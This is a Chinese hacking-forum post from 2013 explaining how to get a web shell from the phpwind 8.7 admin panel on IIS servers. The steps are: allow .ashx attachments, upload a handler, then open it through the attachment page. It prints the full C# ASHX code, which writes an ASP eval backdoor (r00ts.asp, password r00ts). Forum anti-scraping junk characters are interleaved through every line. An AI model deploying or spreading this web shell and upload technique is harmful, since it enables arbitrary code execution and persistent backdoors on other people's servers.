找回密码
 立即注册
查看: 3113|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
3 k& b& o! G5 \! h
3 |+ w  e  ?( J+ t群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
1 U& l1 z% b4 x% ^9 N1 U
/ B7 E( I# V9 t4 H/ F发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整4 ~  e: K  ?" [  R# Q8 J

! k- p- `) r4 h  I5 z然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
9 G/ ~$ F- W. t6 u, }7 Z& K 5 Q5 I/ i8 W$ _1 }9 D* Z: J
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
4 Q  a( _; f3 L3 J$ Q  D# T% h8 V( j
6 y+ _' L/ b' Z7 t1 R+ E下面是代码:
/ u8 l# k7 E& z: q9 z$ y( z/ p
1 Y; e3 i  v2 P7 `0 o% V$ m. I<%@ WebHandler Language="C#"Class="Handler" %>7 T( v2 j4 Y+ G: J  s
using System;& k9 {5 R' S4 Q' E* _# d6 x* g
using System.Web;
% ?9 s9 w1 `: }using System.IO;
6 }* i' z: J% V) q- B  ppublic class Handler : IHttpHandler {) e) V3 R9 N' `: o6 z
public void ProcessRequest (HttpContext context) {
! q. y. L( m2 h9 x* j  Icontext.Response.ContentType = "text/plain";
' Y" G5 Z+ P1 a* P4 K9 K7 uStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));7 m. ]+ Y" @8 M) ]( C) N
file1.Write("<%eval request(\"r00ts\")%>");' p) t' [5 e* S" ^$ Y. K
file1.Flush();
! v2 k: _6 P8 b) kfile1.Close();* R* z5 t% Y7 H0 A9 n( d0 [" I
}
4 b  D7 z1 b0 D# s5 v$ C9 `public bool IsReusable {& m; |: c/ s: |% c6 x
get {
& |, x9 ~- i2 g- ?5 E3 j. ]8 h0 ~return false;
6 A& K. l0 a. Z, ~6 Q2 N}
, |" H; v, v. |$ A}. e8 \$ S/ Z, }0 |; }5 L7 J3 m
}/ y' U- N$ n& U/ e6 ^6 L- ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表